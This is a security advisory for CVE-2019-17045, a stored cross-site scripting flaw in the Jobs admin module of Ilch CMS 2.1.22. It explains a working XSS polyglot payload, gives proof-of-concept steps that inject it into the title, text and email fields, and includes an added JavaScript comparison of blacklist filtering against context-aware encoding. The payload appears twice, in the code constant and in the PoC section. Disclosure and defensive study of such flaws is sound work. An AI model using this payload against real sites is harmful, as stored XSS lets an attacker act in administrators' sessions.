[CVE-2019-17045] Ilch Content Management System v2.1.22 Vulnerability Disclosure

Product Owner: Ilch – Content Management System

CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS – 2.1.22 02/01/22

Application Release Date: 23.05.2019

Severity: High

Authentication: Required

Complexity: Easy

Vulnerability Name: Stored Cross-Site Scripting (XSS) via an XSS polyglot

Vulnerability Explanation: An XSS polyglot is a single XSS vector that executes in several injection contexts (HTML body, quoted attribute value, JavaScript string, JavaScript or HTML comment) in its raw form, without being adapted to each one. That is what makes it useful for testing: one payload submitted into every input field reveals any field whose output is rendered without context-appropriate encoding.

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Anatomy of the polyglot

  • jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
  • /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence (closes backtick, single-quoted and double-quoted strings).
  • (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parentheses; alert() runs as the argument of the call.
  • //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double CRLF in HTTP response headers once URL-decoded.
  • </stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence; mixed case defeats case-sensitive filters, and --!> is accepted by browsers as the end of an HTML comment.
  • \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous-looking svg element whose onload handler fires as soon as it is parsed.
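The following is an added example, not code from the advisory or from Ilch CMS. It drops the advisory's polyglot into six hypothetical server-side templates (assumed stand-ins for a vulnerable page, one per injection context), records which raw sequence lets the payload leave each context, and then compares three handling strategies: no sanitisation, a tag blacklist of the kind the mixed-case tag names are built to slip past, and context-aware output encoding. The template shapes, the blacklist regex and the two encoders are assumptions for illustration. It runs under Node.js with no dependencies.

```javascript
// Added example (Node.js, no dependencies). Not code from the advisory or from
// Ilch CMS: the templates below are assumed stand-ins for a vulnerable page.

// The polyglot from the advisory, with alert() left as the execution marker.
const POLYGLOT =
  "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//" +
  "</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e";

// Hypothetical server-side templates, one per injection context.
const CONTEXTS = {
  htmlBody:    v => `<h1>${v}</h1>`,
  dqAttribute: v => `<input type="text" value="${v}">`,
  jsDqString:  v => `<script>var title = "${v}";</script>`,
  jsTemplate:  v => `<script>var title = \`${v}\`;</script>`,
  jsComment:   v => `<script>/* ${v} */</script>`,
  htmlComment: v => `<!-- ${v} -->`,
};

// The raw sequence that lets the payload leave each context. If it reaches the
// page unencoded, the rest of the polyglot takes over from there.
const BREAKERS = {
  htmlBody:    ["<sVg"],           // opens a new element carrying oNloAd=
  dqAttribute: ['"'],              // closes value="..." so oNcliCk= becomes an attribute
  jsDqString:  ['"', "</scRipt"],  // ends the string literal / ends the script block
  jsTemplate:  ["`", "</scRipt"],
  jsComment:   ["*/", "</scRipt"],
  htmlComment: ["--!>", "<sVg"],   // --!> is accepted by browsers as a comment end
};

// A blacklist "fix" (assumed): strips a few well-known tags, case-insensitively.
function blacklistFilter(v) {
  return v.replace(/<\/?(script|style|iframe|img)[^>]*>/gi, "");
}

// HTML-context encoder: turns & < > " ' ` into numeric character references.
function encodeHtml(v) {
  return v.replace(/[&<>"'`]/g, c => `&#${c.charCodeAt(0)};`);
}

// JavaScript-string-context encoder: every non-alphanumeric becomes \xHH or
// \uHHHH, so neither the JS lexer nor the HTML parser sees a raw delimiter.
function encodeJsString(v) {
  return v.replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// The encoder that matches where the value lands.
const ENCODER_FOR = {
  htmlBody: encodeHtml, dqAttribute: encodeHtml, htmlComment: encodeHtml,
  jsDqString: encodeJsString, jsTemplate: encodeJsString, jsComment: encodeJsString,
};

// Page as the server would emit it after running the value through `sanitize`.
function render(context, sanitize) {
  return CONTEXTS[context](sanitize(POLYGLOT));
}

// Which context-breaking sequences are still present in the value after `sanitize`?
function survivingBreakers(context, sanitize) {
  const value = sanitize(POLYGLOT);
  return BREAKERS[context].filter(b => value.includes(b));
}

// Summary: context -> surviving breakers under each strategy.
function compare() {
  const out = {};
  for (const ctx of Object.keys(CONTEXTS)) {
    out[ctx] = {
      raw: survivingBreakers(ctx, v => v),
      blacklist: survivingBreakers(ctx, blacklistFilter),
      encoded: survivingBreakers(ctx, ENCODER_FOR[ctx]),
    };
  }
  return out;
}

console.log(JSON.stringify(compare(), null, 2));
```

Two things the comparison shows. The blacklist removes the `</stYle/…</scRipt/--!>` run but leaves `<sVg` and the quote characters, so the payload still escapes the HTML body, attribute and JavaScript string contexts. Encoding only works when the encoder matches the context: HTML-entity encoding inside a JavaScript comment leaves `*/` untouched, which is exactly the case `survivingBreakers("jsComment", encodeHtml)` reports.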

Impact:

Stored XSS lets an attacker persist a malicious script in the application's database so that it executes in the browser of every user who later views the affected page; here the payload is saved through the Jobs module and runs in the session of any administrator who opens the Jobs listing, so it can perform any action that administrator can. No link has to be delivered to the victim, unlike reflected XSS, which relies on socially engineering a victim into clicking a crafted URL, for example one sent by email.

Proof of Concept: Stored XSS via the polyglot payload

Affected items: ilchCMS  2.1.22

Step 1: Host the application on a local web server (XAMPP) and install Ilch CMS as per its documentation.

Step 2: Log in to the admin panel.

Step 3: Click the Modules tab.

Step 4: Under Modules, click the Jobs tab.

Step 5: Enter the payload in every input field (title, text, email address).

Step 6: Click Add. The stored XSS fires in the browser immediately, and fires again after every page refresh, because the payload is now stored in the database and rendered unencoded each time the page is built.

XSS payload used (shown wrapped in an HTML comment; the payload itself is the line between <!-- and -->):

<!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e

-->

URL: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat

Reference:

Website: https://www.ilch.de/

Download Version: https://www.ilch.de/downloads-show-1826.html

Video PoC:

Twitter: https://twitter.com/the_pr0fess0r_
